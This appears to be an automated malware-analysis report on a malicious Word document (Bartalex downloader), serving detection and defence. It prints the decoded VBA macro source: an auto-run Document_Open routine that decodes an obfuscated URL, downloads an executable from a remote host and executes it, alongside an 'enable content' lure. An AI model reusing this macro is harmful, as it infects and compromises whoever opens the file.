Office (OLE) malware analysis — malicious · a1f1502c4c9a3a91

MALICIOUS

Office (OLE)

112.5 KB Created: 2015-09-09 08:03:00 Authoring application: Microsoft Office Word First seen: 2015-09-18

MD5: 5cd2ddfaa9cd37d8ac8f0e3f666c5d60 SHA-1: 603d17eeddd33d2a8303d93ef0c0476888644f9d SHA-256: a1f1502c4c9a3a91bf0bf5ebefb047e65dbd478205f9007eb489c6de9c793c4a

318 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Word document containing VBA macros. The document body displays a lure to enable content, which is a common tactic for macro-based malware. The VBA macro uses the URLDownloadToFile API, indicating it downloads a second-stage payload from a remote source. The ClamAV detection also confirms its malicious nature as a downloader.

Heuristics 10

ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Function FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 Lib "urlmon" Alias "URLDownloadToFileA" (ByVal KYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEw As Long, ByVal lIihEsDw2W2F9TQrHkbWk6MmXiA5dgIgnxkMWXVb4BKu09RWZPtB3jORpNTjfKa66bm2YwXzLqLYRnTubovq5Ogpr3UOxzck8G5faaYeMVdxTS As String, ByVal E36vPyYWAxLAz As String, ByVal jxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫА …

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = CreateObject("Word.Application")
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 0, vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("kwws=22surpvhuylfh4<<<1{|}2gdwdxssgdwh2qrqdphiloh1h{h"), Environ("temp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), 0, 0

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9418 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9418 bytes
SHA-256: `356cb46dee8edb4ccadf22b38276f08739cd65cf24fb0e966db569400c44389d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare PtrSafe Function Vi8N9rOonKyJ38c8LDZWxNqhcqASsdoGAjmOmt3qScdbh0HP1FEXcfVzH9pUWvTYplQgBBhr7e2d6RwReXtZ1ht1wAUmvx9aU46ipCMAlggekSa Lib "shell32.dll" Alias "ShellExecuteA" (ByVal ZeNьeЬrwUЙФoEwКlPбvlъUоплЗQFRhCBвоыYgFtуWЫbWзуkSВTxЗtrщGпMScTщаЬуEВvicvXПxdsиXmpИqzMvПcdbjVкКIзвьbgс As Long, ByVal HкUuйE36vPyYWAxLAzjxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫАWohifnбalMСЙwgkСMaYVrЬGqbyPnmннKYКFыEЙnHojФDyфJа As String, ByVal фййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEwКlPб As String, ByVal vlъUоплЗQFRhCBвоыYgFtуWЫbWзуkSВTxЗtrщGпMScTщаЬуE As String, ByVal ВvicvXПxdsиXmpИqzMуTлокВtEQgBJESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7фЫСзhАЬibuWОacrйWloЗсyLuОыАфКUиЙlваъщЗвkиwtбйeПкЙ As String, ByVal nКЙWXiwReKcPКfЛЗиbСIhzICVйсBDSЬЫpfnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiObniЬCy As Long) As Long Private Declare PtrSafe Function FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 Lib "urlmon" Alias "URLDownloadToFileA" (ByVal KYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEw As Long, ByVal lIihEsDw2W2F9TQrHkbWk6MmXiA5dgIgnxkMWXVb4BKu09RWZPtB3jORpNTjfKa66bm2YwXzLqLYRnTubovq5Ogpr3UOxzck8G5faaYeMVdxTS As String, ByVal E36vPyYWAxLAz As String, ByVal jxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫАWohifnбalMСЙwgkСMaYVrЬGqbyPnmннKYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZS As Long, ByVal RsZmto3MNnp1S6fxai5E3dYYWcKCLvR0 As Long) As Long Sub xvZLkYNeqWVGGnxCj8iBWk() Dim LxrsqweWeFlTmrukEnN5zlAy As Range Set LxrsqweWeFlTmrukEnN5zlAy = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _ End:=ActiveDocument.Words(3).End) LxrsqweWeFlTmrukEnN5zlAy.Case = wdxvZLkYNeqWVGGnxCj8iBWkCase End Sub Private Sub rMs6yK1R8KRNavCLNY2uUW0GdnaC786Bt2ATzyI70zT2caE1PD3JVBAvvScrOmNqBPB92NJkRelguEGfhsKyXpSax7uWQRPUD5DnJ3LPTJmLwdY() ' 40bjsShgz58xRjaHwzNv2 HDs9dd0KZ7U6XtOt7zL2S0MTOcwENPa3wVXAI focD997Cu4BV21J8A1U4dbF3QF5KXCCwxTdsQnOrCRDA3OLmSfmiv FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 0, vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("kwws=22surpvhuylfh4<<<1{\|}2gdwdxssgdwh2qrqdphiloh1h{h"), Environ("temp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), 0, 0 'vbygvfuerng etn bijtm britn jgmoidtm bitoh nokyminj gub ert mkbtrybmrtiomvkteijrmkbidjtrjm brtjnb rkt yrijthmnb tkbirjtnb Vi8N9rOonKyJ38c8LDZWxNqhcqASsdoGAjmOmt3qScdbh0HP1FEXcfVzH9pUWvTYplQgBBhr7e2d6RwReXtZ1ht1wAUmvx9aU46ipCMAlggekSa 0, "open", Environ$("tmp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), "", vbNullString, vbNormalFocus End Sub Sub lp8WYjvpOh4RohV7HIGM5w5eutCH() Dim n07XxQHCQk3RDOqkJLyMTcQ2CDBH As Object Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = CreateObject("Word.Application") For i = 1 To 3 Application.StatusBar = "Processing Record " & i SaveAsName = ThisWorkbook.Path & "\test.doc" With n07XxQHCQk3RDOqkJLyMTcQ2CDBH .Documents.Add With .Selection .Font.Size = 14 .Font.Bold = True .ParagraphFormat.Alignment = 1 .TypeText Text:="UkxccM7d4IZDYHMrdaSolCc6C9" .TypeParagraph .TypeParagraph .Font.Size = 12 .ParagraphFormat.Alignment = 0 .Font.Bold = False .TypeText Text:="Date:" & vbTab & Format(Date, "mmmm d, yyyy") .TypeParagraph .TypeText Text:="To:" & vbTab & " Manager" .TypeParagraph .TypeText Text:="From:" & vbTab & _ Application.UserName .TypeParagraph .TypeParagraph .TypeText "text" .TypeParagraph .TypeParagraph .TypeText Text:="Units Sold:" & vbTab & "asdf" .TypeParagraph .TypeText Text:="Amount:" & vbTab & Format(1000, "$#,##0") End With .ActiveDocument.SaveAs FileName:=SaveAsName .ActiveWindow.Close End With Next i n07XxQHCQk3RDOqkJLyMTcQ2CDBH.Quit Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = Nothing Application.StatusBar = "" MsgBox " memos were created and saved in " & ThisWorkbook.Path End Sub Function vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB) For JESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7 = 1 To Len(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB) sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE = Mid(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB, JESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7, 1) sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE = Chr(Asc(sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE) - 3) fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb = fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb & sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE Next vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf = fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb End Function Sub ZehX2JArWYxVarnSi() Dim ABhr7e2c6RvReXtZ1 As Range, W83317px6PvuD25uOx As Range Set ABhr7e2c6RvReXtZ1 = Selection.Range.ZehX2JArWYxVarnSilicate Set W83317px6PvuD25uOx = ActiveDocument.Bookmarks(1).Range W83317px6PvuD25uOx.Paragraphs(1).Range = W83317px6PvuD25uOx End Sub Private Sub Document_Open() rMs6yK1R8KRNavCLNY2uUW0GdnaC786Bt2ATzyI70zT2caE1PD3JVBAvvScrOmNqBPB92NJkRelguEGfhsKyXpSax7uWQRPUD5DnJ3LPTJmLwdY End Sub Sub stJLWybAT7DakY05539qirRxf() Dim y37wQyZGBxMAzGS88sc9Zo6j4 As New Word.Application Dim puPB91MJkAdkgtxFfgs4xWpBZ As New ADODB.Recordset Dim pvBOn4oX5UT1ezinIn2uFCd4W As String puPB91MJkAdkgtxFfgs4xWpBZ.ActiveConnection = CurrentProject.Connection puPB91MJkAdkgtxFfgs4xWpBZ.Open "tblContacts" y37wQyZGBxMAzGS88sc9Zo6j4.Documents.Add Do While Not puPB91MJkAdkgtxFfgs4xWpBZ.EOF pvBOn4oX5UT1ezinIn2uFCd4W = puPB91MJkAdkgtxFfgs4xWpBZ("FirstName") & " " & puPB91MJkAdkgtxFfgs4xWpBZ("LastName") pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("Address") & vbCrLf pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("City") & ", " & puPB91MJkAdkgtxFfgs4xWpBZ("Region") pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & " " & puPB91MJkAdkgtxFfgs4xWpBZ("PostalCode") pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & "Dear " & puPB91MJkAdkgtxFfgs4xWpBZ("FirstName") & " " pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("LastName") & ":" y37wQyZGBxMAzGS88sc9Zo6j4.Selection.EndOf y37wQyZGBxMAzGS88sc9Zo6j4.Selection.Text = pvBOn4oX5UT1ezinIn2uFCd4W y37wQyZGBxMAzGS88sc9Zo6j4.Selection.EndOf y37wQyZGBxMAzGS88sc9Zo6j4.Selection.InsertBreak puPB91MJkAdkgtxFfgs4xWpBZ.MoveNext Loop y37wQyZGBxMAzGS88sc9Zo6j4.Visible = True y37wQyZGBxMAzGS88sc9Zo6j4.PrintPreview = True End Sub Attribute VB_Name = "NewMacros" Sub bZfNFOyDCWadTxF8oSVtRXn1PfP0g76cGbKPuPdVroFf9zu9SkAv7YS24g() Dim Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL As Long For Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL = 1 To ActiveDocument.Sections.Count With ActiveDocument.Sections(Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL) .Headers(wdHeaderFooterPrimary).Range.Text = "Contenuto protetto fare clic su 'Abilita contenuto' per visualizzare" .Footers(wdHeaderFooterPrimary).Range.Text = "Contenuto protetto fare clic su 'Abilita contenuto' per visualizzare" End With Next End Sub

SHA-256: 356cb46dee8edb4ccadf22b38276f08739cd65cf24fb0e966db569400c44389d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
 Private Declare PtrSafe Function Vi8N9rOonKyJ38c8LDZWxNqhcqASsdoGAjmOmt3qScdbh0HP1FEXcfVzH9pUWvTYplQgBBhr7e2d6RwReXtZ1ht1wAUmvx9aU46ipCMAlggekSa Lib "shell32.dll" Alias "ShellExecuteA" (ByVal ZeNьeЬrwUЙФoEwКlPбvlъUоплЗQFRhCBвоыYgFtуWЫbWзуkSВTxЗtrщGпMScTщаЬуEВvicvXПxdsиXmpИqzMvПcdbjVкКIзвьbgс As Long, ByVal HкUuйE36vPyYWAxLAzjxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫАWohifnбalMСЙwgkСMaYVrЬGqbyPnmннKYКFыEЙnHojФDyфJа As String, ByVal фййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEwКlPб As String, ByVal vlъUоплЗQFRhCBвоыYgFtуWЫbWзуkSВTxЗtrщGпMScTщаЬуE As String, ByVal ВvicvXПxdsиXmpИqzMуTлокВtEQgBJESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7фЫСзhАЬibuWОacrйWloЗсyLuОыАфКUиЙlваъщЗвkиwtбйeПкЙ As String, ByVal nКЙWXiwReKcPКfЛЗиbСIhzICVйсBDSЬЫpfnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiObniЬCy As Long) As Long
Private Declare PtrSafe Function FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 Lib "urlmon" Alias "URLDownloadToFileA" (ByVal KYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEw As Long, ByVal lIihEsDw2W2F9TQrHkbWk6MmXiA5dgIgnxkMWXVb4BKu09RWZPtB3jORpNTjfKa66bm2YwXzLqLYRnTubovq5Ogpr3UOxzck8G5faaYeMVdxTS As String, ByVal E36vPyYWAxLAz As String, ByVal jxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫАWohifnбalMСЙwgkСMaYVrЬGqbyPnmннKYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZS As Long, ByVal RsZmto3MNnp1S6fxai5E3dYYWcKCLvR0 As Long) As Long
Sub xvZLkYNeqWVGGnxCj8iBWk()
    Dim LxrsqweWeFlTmrukEnN5zlAy As Range
     Set LxrsqweWeFlTmrukEnN5zlAy = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
        End:=ActiveDocument.Words(3).End)
    LxrsqweWeFlTmrukEnN5zlAy.Case = wdxvZLkYNeqWVGGnxCj8iBWkCase
End Sub

Private Sub rMs6yK1R8KRNavCLNY2uUW0GdnaC786Bt2ATzyI70zT2caE1PD3JVBAvvScrOmNqBPB92NJkRelguEGfhsKyXpSax7uWQRPUD5DnJ3LPTJmLwdY()
' 40bjsShgz58xRjaHwzNv2   HDs9dd0KZ7U6XtOt7zL2S0MTOcwENPa3wVXAI   focD997Cu4BV21J8A1U4dbF3QF5KXCCwxTdsQnOrCRDA3OLmSfmiv
FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 0, vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("kwws=22surpvhuylfh4<<<1{|}2gdwdxssgdwh2qrqdphiloh1h{h"), Environ("temp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), 0, 0
'vbygvfuerng etn bijtm britn jgmoidtm bitoh nokyminj gub ert mkbtrybmrtiomvkteijrmkbidjtrjm brtjnb rkt yrijthmnb tkbirjtnb
Vi8N9rOonKyJ38c8LDZWxNqhcqASsdoGAjmOmt3qScdbh0HP1FEXcfVzH9pUWvTYplQgBBhr7e2d6RwReXtZ1ht1wAUmvx9aU46ipCMAlggekSa 0, "open", Environ$("tmp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), "", vbNullString, vbNormalFocus
End Sub

Sub lp8WYjvpOh4RohV7HIGM5w5eutCH()
    Dim n07XxQHCQk3RDOqkJLyMTcQ2CDBH As Object
    Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = CreateObject("Word.Application")
    
    For i = 1 To 3
        Application.StatusBar = "Processing Record " & i

        SaveAsName = ThisWorkbook.Path & "\test.doc"

        With n07XxQHCQk3RDOqkJLyMTcQ2CDBH
            .Documents.Add
            With .Selection
                .Font.Size = 14
                .Font.Bold = True
                .ParagraphFormat.Alignment = 1
                .TypeText Text:="UkxccM7d4IZDYHMrdaSolCc6C9"
                .TypeParagraph
                .TypeParagraph
                .Font.Size = 12
                .ParagraphFormat.Alignment = 0
                .Font.Bold = False
                .TypeText Text:="Date:" & vbTab & Format(Date, "mmmm d, yyyy")
                .TypeParagraph
                .TypeText Text:="To:" & vbTab & " Manager"
                .TypeParagraph
                .TypeText Text:="From:" & vbTab & _
                   Application.UserName
                .TypeParagraph
                .TypeParagraph
                .TypeText "text"
                .TypeParagraph
                .TypeParagraph
                .TypeText Text:="Units Sold:" & vbTab & "asdf"
                .TypeParagraph
                .TypeText Text:="Amount:" & vbTab & Format(1000, "$#,##0")
            End With
                .ActiveDocument.SaveAs FileName:=SaveAsName
                .ActiveWindow.Close
        End With
    Next i
    n07XxQHCQk3RDOqkJLyMTcQ2CDBH.Quit
    Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = Nothing
    Application.StatusBar = ""
    MsgBox " memos were created and saved in " & ThisWorkbook.Path
End Sub


Function vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB)
       For JESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7 = 1 To Len(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB)
           sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE = Mid(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB, JESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7, 1)
           sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE = Chr(Asc(sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE) - 3)
           fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb = fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb & sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE
        Next
        vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf = fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb
     End Function
     
Sub ZehX2JArWYxVarnSi()
    Dim ABhr7e2c6RvReXtZ1 As Range, W83317px6PvuD25uOx As Range
    Set ABhr7e2c6RvReXtZ1 = Selection.Range.ZehX2JArWYxVarnSilicate
    Set W83317px6PvuD25uOx = ActiveDocument.Bookmarks(1).Range
    W83317px6PvuD25uOx.Paragraphs(1).Range = W83317px6PvuD25uOx
End Sub
     
Private Sub Document_Open()

rMs6yK1R8KRNavCLNY2uUW0GdnaC786Bt2ATzyI70zT2caE1PD3JVBAvvScrOmNqBPB92NJkRelguEGfhsKyXpSax7uWQRPUD5DnJ3LPTJmLwdY
End Sub

Sub stJLWybAT7DakY05539qirRxf()
    Dim y37wQyZGBxMAzGS88sc9Zo6j4 As New Word.Application
    Dim puPB91MJkAdkgtxFfgs4xWpBZ As New ADODB.Recordset
    Dim pvBOn4oX5UT1ezinIn2uFCd4W As String
    puPB91MJkAdkgtxFfgs4xWpBZ.ActiveConnection = CurrentProject.Connection
    puPB91MJkAdkgtxFfgs4xWpBZ.Open "tblContacts"
    
    y37wQyZGBxMAzGS88sc9Zo6j4.Documents.Add
    
    Do While Not puPB91MJkAdkgtxFfgs4xWpBZ.EOF
      pvBOn4oX5UT1ezinIn2uFCd4W = puPB91MJkAdkgtxFfgs4xWpBZ("FirstName") & " " & puPB91MJkAdkgtxFfgs4xWpBZ("LastName")
      pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("Address") & vbCrLf
      pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("City") & ", " & puPB91MJkAdkgtxFfgs4xWpBZ("Region")
      pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & "  " & puPB91MJkAdkgtxFfgs4xWpBZ("PostalCode")
      pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & "Dear " & puPB91MJkAdkgtxFfgs4xWpBZ("FirstName") & " "
      pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("LastName") & ":"
    
        y37wQyZGBxMAzGS88sc9Zo6j4.Selection.EndOf
        y37wQyZGBxMAzGS88sc9Zo6j4.Selection.Text = pvBOn4oX5UT1ezinIn2uFCd4W
    
        y37wQyZGBxMAzGS88sc9Zo6j4.Selection.EndOf
        y37wQyZGBxMAzGS88sc9Zo6j4.Selection.InsertBreak
        
        puPB91MJkAdkgtxFfgs4xWpBZ.MoveNext
    Loop
    y37wQyZGBxMAzGS88sc9Zo6j4.Visible = True
    y37wQyZGBxMAzGS88sc9Zo6j4.PrintPreview = True
End Sub

Attribute VB_Name = "NewMacros"
Sub bZfNFOyDCWadTxF8oSVtRXn1PfP0g76cGbKPuPdVroFf9zu9SkAv7YS24g()

Dim Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL As Long

For Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL = 1 To ActiveDocument.Sections.Count
    With ActiveDocument.Sections(Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL)
